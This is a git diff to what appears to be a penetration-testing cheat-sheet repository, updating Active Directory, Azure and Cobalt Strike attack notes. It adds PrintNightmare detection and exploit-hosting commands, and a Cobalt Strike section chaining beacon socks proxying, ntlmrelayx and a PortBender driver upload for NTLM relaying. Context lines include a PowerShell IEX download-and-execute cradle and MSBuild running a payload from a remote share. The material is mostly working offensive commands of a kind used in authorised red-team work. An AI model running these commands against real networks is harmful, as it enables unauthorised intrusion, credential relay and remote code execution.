diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 229f069..4fb51bd 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -601,19 +601,20 @@ Requirements: **Detect the vulnerability**: * Impacket - [rpcdump](https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/rpcdump.py) ```ps1 - python3 ./rpcdump.py @10.0.2.10 | grep MS-RPRN + python3 ./rpcdump.py @10.0.2.10 | egrep 'MS-RPRN|MS-PAR' Protocol: [MS-RPRN]: Print System Remote Protocol ``` * [It Was All A Dream](https://github.com/byt3bl33d3r/ItWasAllADream) ```ps1 git clone https://github.com/byt3bl33d3r/ItWasAllADream cd ItWasAllADream && poetry install && poetry shell - itwasalladream -u user -p password -d domain 192.168.1.0/24 + itwasalladream -u user -p Password123 -d domain 10.10.10.10/24 + docker run -it itwasalladream -u username -p Password123 -d domain 10.10.10.10 ``` **Trigger the exploit**: -**NOTE**: The payload can be hosted on Impacket SMB server since [PR #1109](https://github.com/SecureAuthCorp/impacket/pull/1109): `python3 ./smbserver.py share /tmp/smb/` +**NOTE**: The payload can be hosted on Impacket SMB server since [PR #1109](https://github.com/SecureAuthCorp/impacket/pull/1109): `python3 ./smbserver.py share /tmp/smb/` or using [Invoke-BuildAnonymousSMBServer](https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer/blob/main/Invoke-BuildAnonymousSMBServer.ps1) : `Import-Module .\Invoke-BuildAnonymousSMBServer.ps1; Invoke-BuildAnonymousSMBServer -Path C:\Share -Mode Enable` * [SharpNightmare](https://github.com/cube0x0/CVE-2021-1675) ```powershell @@ -2873,4 +2874,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [Playing with PrintNightmare - 0xdf - Jul 8, 2021](https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html) * [Attacking Active Directory: 0 to 0.9 - Eloy Pérez González - 2021/05/29](https://zer1t0.gitlab.io/posts/attacking_ad/) * [Microsoft ADCS – Abusing PKI in Active Directory Environment - Jean MARSAULT - 14/06/2021](https://www.riskinsight-wavestone.com/en/2021/06/microsoft-adcs-abusing-pki-in-active-directory-environment/) -* [Certified Pre-Owned - Will Schroeder and Lee Christensen - June 17, 2021](http://www.harmj0y.net/blog/activedirectory/certified-pre-owned/) \ No newline at end of file +* [Certified Pre-Owned - Will Schroeder and Lee Christensen - June 17, 2021](http://www.harmj0y.net/blog/activedirectory/certified-pre-owned/) +* [NTLM relaying to AD CS - On certificates, printers and a little hippo - Dirk-jan Mollema](https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/) \ No newline at end of file diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md index 349a3f9..c665353 100644 --- a/Methodology and Resources/Cloud - Azure Pentest.md +++ b/Methodology and Resources/Cloud - Azure Pentest.md @@ -1037,7 +1037,7 @@ Use the script **azuread_decrypt_msol.ps1** from @xpn to recover the decrypted p Now you can use the retrieved credentials for the MSOL Account to launch a DCSync attack. -## Azure AD Connect - Seamless Single Sign On Silver Ticket +### Azure AD Connect - Seamless Single Sign On Silver Ticket > Anyone who can edit properties of the AZUREADSSOACCS$ account can impersonate any user in Azure AD using Kerberos (if no MFA) diff --git a/Methodology and Resources/Cobalt Strike - Cheatsheet.md b/Methodology and Resources/Cobalt Strike - Cheatsheet.md index 782e920..de13806 100644 --- a/Methodology and Resources/Cobalt Strike - Cheatsheet.md +++ b/Methodology and Resources/Cobalt Strike - Cheatsheet.md @@ -37,6 +37,7 @@ $ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstri * [Resource Kit](#resource-kit) * [Artifact Kit](#artifact-kit) * [Mimikatz Kit](#mimikatz-kit) +* [NTLM Relaying via Cobalt Strike](#ntlm-relaying-via-cobalt-strike) * [References](#references) @@ -169,6 +170,7 @@ $ %windir%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe \\10.10.10.10\Shared\d * Cobalt Strike - Malleable C2 Profiles https://github.com/xx0hcd/Malleable-C2-Profiles * Cobalt Strike Malleable C2 Design and Reference Guide https://github.com/threatexpress/malleable-c2 * Malleable-C2-Profiles https://github.com/rsmudge/Malleable-C2-Profiles +* SourcePoint is a C2 profile generator https://github.com/Tylous/SourcePoint ```powershell set useragent "SOME AGENT"; # GOOD @@ -472,6 +474,16 @@ Artifact Kit (Cobalt Strike 4.0) - https://www.youtube.com/watch?v=6mC21kviwG4 : * Load the mimikatz.cna aggressor script * Use mimikatz functions as normal +## NTLM Relaying via Cobalt Strike + +```powershell +beacon> socks 1080 +kali> proxychains python3 /usr/local/bin/ntlmrelayx.py -t smb:// +beacon> rportfwd_local 8445 445 +beacon> upload C:\Tools\PortBender\WinDivert64.sys +beacon> PortBender redirect 445 8445 +``` + ## References * [Red Team Ops with Cobalt Strike (1 of 9): Operations](https://www.youtube.com/watch?v=q7VQeK533zI) @@ -487,4 +499,5 @@ Artifact Kit (Cobalt Strike 4.0) - https://www.youtube.com/watch?v=6mC21kviwG4 : * [Cobalt Strike. Walkthrough for Red Teamers - Neil Lines - 15 Apr 2019](https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/) * [TALES OF A RED TEAMER: HOW TO SETUP A C2 INFRASTRUCTURE FOR COBALT STRIKE – UB 2018 - NOV 25 2018](https://holdmybeersecurity.com/2018/11/25/tales-of-a-red-teamer-how-to-setup-a-c2-infrastructure-for-cobalt-strike-ub-2018/) * [Cobalt Strike - DNS Beacon](https://www.cobaltstrike.com/help-dns-beacon) -* [How to Write Malleable C2 Profiles for Cobalt Strike - January 24, 2017](https://bluescreenofjeff.com/2017-01-24-how-to-write-malleable-c2-profiles-for-cobalt-strike/) \ No newline at end of file +* [How to Write Malleable C2 Profiles for Cobalt Strike - January 24, 2017](https://bluescreenofjeff.com/2017-01-24-how-to-write-malleable-c2-profiles-for-cobalt-strike/) +* [NTLM Relaying via Cobalt Strike - July 29, 2021 - Rasta Mouse](https://rastamouse.me/ntlm-relaying-via-cobalt-strike/) \ No newline at end of file